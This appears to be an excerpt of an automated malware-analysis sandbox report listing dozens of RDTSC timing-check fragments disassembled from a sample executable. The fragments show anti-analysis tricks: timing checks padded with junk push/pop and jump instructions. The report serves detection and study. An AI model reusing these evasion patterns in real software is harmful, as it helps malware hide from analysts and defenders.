                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11E2968 second address: 11E297A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007FD09CB0C7EEh 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11E27C3 second address: 11E27CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11E27CD second address: 11E27D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11E27D3 second address: 11E27E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CF151BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11E27E4 second address: 11E27E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11E27E9 second address: 11E27EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11F9475 second address: 11F947C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11F9075 second address: 11F9079 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 120D733 second address: 120D744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD09CB0C7EDh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 120D744 second address: 120D748 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 120D8F9 second address: 120D907 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD09CB0C7EAh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 120D907 second address: 120D923 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD09CF151B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jns 00007FD09CF151C2h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 120DD55 second address: 120DD5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 120DD5B second address: 120DD61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 120DD61 second address: 120DD65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 120DD65 second address: 120DD6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 120DD6E second address: 120DD74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 120E2CE second address: 120E2EF instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD09CF151BEh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FD09CF151BDh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 120E2EF second address: 120E301 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 pushad 0x0000000a ja 00007FD09CB0C7E6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1212542 second address: 1212546 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1212923 second address: 121294E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD09CB0C7E8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov edx, dword ptr [ebp+122D2E95h] 0x00000013 push 00000004h 0x00000015 pushad 0x00000016 add dl, FFFFFF84h 0x00000019 popad 0x0000001a call 00007FD09CB0C7E9h 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 121294E second address: 1212954 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1212954 second address: 1212969 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD09CB0C7ECh 0x00000008 jnc 00007FD09CB0C7E6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1212C6B second address: 1212CD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 jmp 00007FD09CF151C7h 0x0000000c push ebx 0x0000000d jno 00007FD09CF151B6h 0x00000013 pop ebx 0x00000014 popad 0x00000015 nop 0x00000016 push dword ptr [ebp+122D390Eh] 0x0000001c push 00000000h 0x0000001e push esi 0x0000001f call 00007FD09CF151B8h 0x00000024 pop esi 0x00000025 mov dword ptr [esp+04h], esi 0x00000029 add dword ptr [esp+04h], 00000014h 0x00000031 inc esi 0x00000032 push esi 0x00000033 ret 0x00000034 pop esi 0x00000035 ret 0x00000036 mov dword ptr [ebp+1245D49Dh], eax 0x0000003c push C7B09500h 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007FD09CF151C0h 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1215B9C second address: 1215BA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1215BA2 second address: 1215BC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jns 00007FD09CF151CDh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1215BC4 second address: 1215BEC instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD09CB0C7EEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD09CB0C7F0h 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1215BEC second address: 1215BF2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1217659 second address: 1217668 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 jns 00007FD09CB0C7E6h 0x0000000e pop edi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1217668 second address: 121766D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1129D2D second address: 1129D46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jc 00007FD09CB0C7E6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jbe 00007FD09CB0C7E6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1129D46 second address: 1129D55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CF151BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 112A0D5 second address: 112A0D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 51A0680 second address: 51A0686 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 51A0786 second address: 51A07BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CB0C7EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushfd 0x0000000c jmp 00007FD09CB0C7EEh 0x00000011 adc ecx, 635A3C18h 0x00000017 jmp 00007FD09CB0C7EBh 0x0000001c popfd 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 51A07BA second address: 51A07C6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, esi 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 51A07C6 second address: 51A082A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FD09CB0C7F8h 0x0000000b jmp 00007FD09CB0C7F5h 0x00000010 popfd 0x00000011 popad 0x00000012 lea eax, dword ptr [ebp-04h] 0x00000015 jmp 00007FD09CB0C7EEh 0x0000001a nop 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e jmp 00007FD09CB0C7F9h 0x00000023 popad 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 51A082A second address: 51A0858 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CF151C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FD09CF151C1h 0x0000000f nop 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 51A0858 second address: 51A085E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 51A085E second address: 51A0873 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD09CF151C1h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 51A0873 second address: 51A0884 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 51A0884 second address: 51A0888 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 51A0888 second address: 51A089E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CB0C7F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 51A0909 second address: 51A091D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD09CF151C0h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 51A091D second address: 51A0968 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CB0C7EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [ebp-04h], 00000000h 0x0000000f jmp 00007FD09CB0C7F6h 0x00000014 mov esi, eax 0x00000016 pushad 0x00000017 mov cl, 6Fh 0x00000019 mov esi, edx 0x0000001b popad 0x0000001c je 00007FD09CB0C81Bh 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FD09CB0C7F0h 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 51A09A6 second address: 51A09AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 51900DE second address: 51900F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 mov dx, 830Eh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c sub esp, 2Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push esi 0x00000013 pop edx 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 51900F3 second address: 51900F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 51900F9 second address: 5190130 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CB0C7F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007FD09CB0C7EEh 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FD09CB0C7EEh 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 51901C8 second address: 51901CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 51901CC second address: 51901E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CB0C7F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 51901E8 second address: 51901EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 51901EE second address: 51901F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 51901F2 second address: 5190205 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 5190205 second address: 5190209 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 5190209 second address: 519020D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 519020D second address: 5190213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 5190213 second address: 5190234 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edi 0x00000005 mov edi, eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a inc ebx 0x0000000b jmp 00007FD09CF151BEh 0x00000010 test al, al 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 5190234 second address: 5190238 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 5190238 second address: 519023E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 519023E second address: 5190244 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 51902CE second address: 51902FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 4069E86Dh 0x00000008 mov eax, 70499E69h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 jmp 00007FD09CF151C4h 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov al, 11h 0x0000001c movsx ebx, cx 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 51902FD second address: 5190337 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD09CB0C7F1h 0x00000009 add esi, 1293B7D6h 0x0000000f jmp 00007FD09CB0C7F1h 0x00000014 popfd 0x00000015 mov dx, ax 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b nop 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 5190337 second address: 519033B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 519033B second address: 5190341 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 5190367 second address: 519036D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 519036D second address: 5190463 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CB0C7EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FD09CB0C7EEh 0x00000012 or ecx, 26998AB8h 0x00000018 jmp 00007FD09CB0C7EBh 0x0000001d popfd 0x0000001e jmp 00007FD09CB0C7F8h 0x00000023 popad 0x00000024 jg 00007FD10EA0A8B6h 0x0000002a jmp 00007FD09CB0C7F0h 0x0000002f js 00007FD09CB0C81Dh 0x00000035 jmp 00007FD09CB0C7F0h 0x0000003a cmp dword ptr [ebp-14h], edi 0x0000003d pushad 0x0000003e mov cx, 268Dh 0x00000042 mov cx, 9E89h 0x00000046 popad 0x00000047 jne 00007FD10EA0A88Ch 0x0000004d jmp 00007FD09CB0C7F4h 0x00000052 mov ebx, dword ptr [ebp+08h] 0x00000055 jmp 00007FD09CB0C7F0h 0x0000005a lea eax, dword ptr [ebp-2Ch] 0x0000005d pushad 0x0000005e mov dh, ah 0x00000060 pushfd 0x00000061 jmp 00007FD09CB0C7F3h 0x00000066 sub ax, 594Eh 0x0000006b jmp 00007FD09CB0C7F9h 0x00000070 popfd 0x00000071 popad 0x00000072 xchg eax, esi 0x00000073 push eax 0x00000074 push edx 0x00000075 push eax 0x00000076 push edx 0x00000077 push eax 0x00000078 push edx 0x00000079 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 5190463 second address: 5190467 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 5190467 second address: 519046D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 519046D second address: 51904CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CF151C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FD09CF151BBh 0x0000000f xchg eax, esi 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FD09CF151C4h 0x00000017 xor si, 9358h 0x0000001c jmp 00007FD09CF151BBh 0x00000021 popfd 0x00000022 mov dx, si 0x00000025 popad 0x00000026 nop 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FD09CF151C1h 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 51904CF second address: 51904D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 51904D5 second address: 51904D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 5180DE5 second address: 5180DEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 5180DEB second address: 5180E05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CF151BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov ax, di 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 5180E94 second address: 5180E9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dx, 5B5Eh 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 5180E9D second address: 5180EE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CF151C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FD09CF151BDh 0x00000013 and si, 4996h 0x00000018 jmp 00007FD09CF151C1h 0x0000001d popfd 0x0000001e mov ch, 96h 0x00000020 popad 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 519089A second address: 51908A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CB0C7EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 51908A9 second address: 51908C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD09CF151C4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 51908C1 second address: 51908D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CB0C7EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 51908D9 second address: 51908DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 51908DD second address: 51908E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 51908E1 second address: 51908E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 51908E7 second address: 5190916 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD09CB0C7F8h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f movsx edx, si 0x00000012 mov bl, cl 0x00000014 popad 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 5190916 second address: 519091A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 519091A second address: 5190920 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
